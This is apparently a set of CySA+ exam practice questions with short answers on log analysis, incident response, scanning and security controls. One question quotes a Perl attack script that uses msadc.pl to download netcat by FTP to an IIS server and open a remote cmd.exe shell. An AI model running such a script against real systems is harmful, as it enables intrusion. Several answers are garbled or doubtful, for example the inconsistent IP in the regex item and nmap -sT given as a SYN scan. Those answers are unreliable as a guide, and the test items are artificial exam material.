CySA+ PT 2
Consider the following REGEX search string:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.<br /> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\. (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.<br /> (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Which of the following strings would NOT be included in the output of this search?
37.259.129.207. The logical shortcut is to look at the answer first and see that they all look like IP addresses. Remember, grep, and REGEX are used by a cybersecurity analyst to search logs for indicators of compromise (like an IP address), so don't be afraid to take a logical guess if you need to conserve time during your exam. So, which one isn't a valid IP address? Clearly, 37.259.129.107 is not a valid IP address, so if you had to guess as to what wouldn't be an output of this complex-looking command, you should guess that one!
Your organization has noticed an increase in the number of security incidents being detected. To better understand the situation and measure the effectiveness of your incident response process, what key performance indicator (KPI) could you use?
Alert volume. An increase in alert volume may correlate with an increase in detected incidents.
Evaluate the following log entry:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Jan 11 05:52:56 lx1 kernel: iptables INPUT drop IN=eth0 OUT= MAC=00:15:5d:01:ca:55:00:15:5d:01:ca:ad:08:00 SRC=10.1.0.102 DST=10.1.0.10 LEN=52 TOS=0x00 PREC=0x00 TTL=128 ID=3988 DF PROTO=TCP SPT=2583 DPT=23 WINDOW=64240 RES=0x00 SYN URGP=0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Based on this log entry, which of the following statements are true?
An attempted connection to the telnet service was prevented. The packet was blocked inbound to the network
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?
Behavior
What technology is NOT PKI x.509 compliant and cannot be used in various secure functions?
Blowfish. AES, PKCS, and SSL/TLS are all compatible with x.509
A penetration tester discovered a web server running IIS 4.0 during their enumeration phase. The tester decided to use the msadc.pl attack script to execute arbitrary commands on the webserver. While the msadc.pl script is effective, and the pentester found it too monotonous to perform extended functions. During further research, the penetration tester found a perl script that runs the following msadc commands:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-system("perl msadc.pl -h $host -C \"echo $user>>tempfile\"");system("perl msadc.pl -h $host -C \"echo $pass>>tempfile\"");system("perl msadc.pl -h $host -C \"echo bin>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get nc.exe>>tempfile\"");system("perl msadc.pl -h $host -C \"echo get hacked.html>>tempfile\"");("perl msadc.pl -h $host -C \"echo quit>>tempfile\"");system("perl msadc.pl -h $host -C \"ftp \-s\:tempfile\"");$o=; print "Opening FTP connection...\n";<br />system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Which exploit is indicated by this script
Chained exploit. The script is an example of a chained exploit because it combines several programs into one, including writing to a temporary file, netcat usage, and FTP usage. Chained exploits integrate more than one form of attack to accomplish their goal.
You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636. The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible. What should you do?
Change all devices and servers that support it to port 636 since encrypted services run by default on port 636
Jeff has been contacted by an external security company and told that they had found a copy of his company's proprietary source code on GitHub. Upon further investigation, Jeff has determined that his organization owns the repository where the source code is located. Which of the following mitigations should Jeff apply immediately?
Change the repository from public to private
Which of the following is NOT considered a phase in the incident response cycle?
Communication/Notification. The incident response cycle is Preparation; detection and analysis; containment, eradication and recovery; and post-incident activity.
A recent threat has been announced in the cybersecurity world, stating a critical vulnerability in a particular operating system's kernel. Unfortunately, your company has not maintained a current asset inventory, so you are unsure of how many of your servers may be affected. What should you do to find all of the affected servers within your network?
Conduct an OS fingerprinting scan across the network
Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation?
Create a hash digest of the source drive and the image file to ensure they match
Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?
Data enrichment.
Your organization is a financial services company. You have a team of security analysts who are responsible for gathering and analyzing intelligence about potential threats to your organization. The analysts recently published a report that identifies a new threat actor who is targeting financial services companies. The report includes information about the threat actor's tactics, techniques, and procedures (TTPs). In which phase of the security intelligence cycle will this information be provided to those who need to act on it?
Dissemination
Which of the following tools can NOT be used to conduct a banner grab from a web server on a remote host?
FTP
Which of the following vulnerabilities was considered the MOST critical because of its potential for a high degree of impact and exploitability?
Heartbleed
How does timely and effective communication and reporting of vulnerabilities assist an organization in meeting the GDPR's requirement of reporting data breaches within 72 hours of detection?
It facilitates quicker identification of vulnerabilities enabling prompt reporting to the supervisory authority
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role?
MSSP. A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings.
Due to new regulations, your organization's CIO has the information security team institute a vulnerability management program. What framework would BEST support this program's establishment?
NIST. A vulnerability management program framework.
You are reviewing the latest list of important web application security controls published by OWASP. Which of these items is LEAST likely to appear on that list?
Obscure web interface locations. The least likely option to appear in the list is to obscure web interface locations.
During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident?
PII of company employees and customers was exfiltrated
An attacker recently compromised an e-commerce website for a clothing store. Which of the following methods did the attacker use to harvest an account's cached credentials when the user logged into an SSO system?
Pass the hash. Used for harvesting an account's cached credentials.
During a collaboration between a startup and a multinational corporation, the signed Memorandum of Understanding (MOU) has placed some limitations on the startup's system access. What could this potentially lead to?
Potentially restricting ability to fully remediate vulnerabilities
You are in the recovery steps of an incident response. Throughout the incident, your team never successfully determined the root cause of the network compromise. Which of the following options would you LEAST likely perform as part of your recovery and remediation actions?
Proactively sanitize and reimage all of your routers and switches
In 2013, retail giant Target Corporation experienced a massive data breach, exposing the credit and debit card information of 40 million customers. Following this security incident, a special team was tasked with investigating the fundamental cause of the breach, uncovering the sequence of events that led to it, and providing insights to prevent such occurrences in the future. What term best describes this deep-dive investigative process?
Root cause analysis
Which of the following frameworks is commonly used for sharing threat intelligence information in a standardized format?
STIX is a standardized language for representing and sharing threat intelligence.
Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?
Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability
Which of the following is a best practice that should be followed when scheduling vulnerability scans of an organization's data center?
Schedule scans to run during periods of low activity
You just completed an nmap scan against a workstation and received the following output:-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-# nmap diontraining012Starting Nmap ( http://nmap.org )Nmap scan report for diontraining012 (192.168.14.61)Not shown: 997 filtered portsPORT STATE 135/tcp open139/tcp open445/tcp open Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds-=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=--=-=-=-=-=-=-Based on these results, which of the following operating system is most likely being run by this workstation?
The workstation is most likely running a version of the Windows operating system. Port 139 and port 445 are associated with the SMB file and printer sharing service run by Windows.
You need to determine the best way to test operating system patches in a lab environment before deploying them to your automated patch management system. Unfortunately, your network has several different operating systems in use, but you only have one machine available to test the patches on. What is the best environment to utilize to perform the testing of the patches before deployment?
Virturalization
What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker?
Zone transfers. Easy way to send all the DNS info from one DNS server to another.
A cybersecurity analyst has received an alert that sensors continuously observe well-known call home messages at their network boundary. Still, the organization's proxy firewall is properly configured to successfully drop the messages before leaving the network. Which of the following is MOST likely the cause of the call home messages being sent? An attacker is performing reconnaissance the organization's workstations Malware is running on a company workstation or server A malicious insider is trying to exfiltrate information to a remote network An infected workstation is attempting to reach a command and control server (Correct)
an infected workstation is attempting to reach a command and control server
You are conducting a quick nmap scan of a target network. You want to conduct an SYN scan, but you don't have raw socket privileges on your workstation. Which of the following commands should you use to conduct the SYN scan from your workstation?
nmap -sT
